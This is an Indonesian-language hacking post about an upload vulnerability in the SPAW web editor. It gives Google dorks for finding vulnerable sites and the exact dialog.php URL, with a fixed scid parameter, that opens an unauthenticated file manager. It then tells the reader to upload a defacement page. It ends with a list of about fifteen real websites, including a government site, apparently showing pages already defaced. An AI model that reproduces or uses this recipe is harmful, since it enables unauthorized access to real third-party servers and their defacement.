spaw upload vuln



  1. Cari target di google atau bing dengan dork atau query untuk seaching : [inurl:"spaw2/dialogs/" ] [ inurl:"spaw2/uploads/files/" ] dan [ inurl:"spaw/upload/"]
  2.  Pilih target yang Vuln.
  3. Jika sudah dapat targetnya;Contoh :http://www.target.com/admin/spaw2/uploads/files/hack.pdf ganti uploads/files/hack.pdf dengan dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
  4. Dan hasilnya menjadi : http://www.target.com/admin/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset&scid=cf73b58bb51c52235494da752d98cac9&type=files Kemudian Tekan enter
  5. Setelah itu kamu akan menemukan tempat untuk mengupload file,
  6. Nah sekarang tinggal upload file defacesan kamu....!!!!

  • http://www.leer.org.ar/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.thecus.com/upload/Firmaan%20Van%20John.html
  • http://www.evanjsmith.com/images/Firmaan%20Van%20John.html
  • http://herbal-acupuncture.com/admin/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://apsetubal.com/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.ctl.utm.my/news/libs/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.globaltrucks.hu/spaw2/uploads/files/Firmaan%20Van%20John.htmlhttp://speciaalclubkleur.nl/files/files/Firmaan%20Van%20John.html
  • http://www.lom.com.pl/js/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.linx-lmn.ro/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.revista22.ro/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.osti.ru/admin/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.mpak.su/include/spaw2/uploads/www.mpak.su/Firmaan%20Van%20John.html
  • http://www.altea.su/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://www.senate.go.th/profile/spaw2/uploads/files/Firmaan%20Van%20John.html
  • http://antalyaosb.org.tr/spaw2/uploads/files/Firmaan%20Van%20John.html

Komentar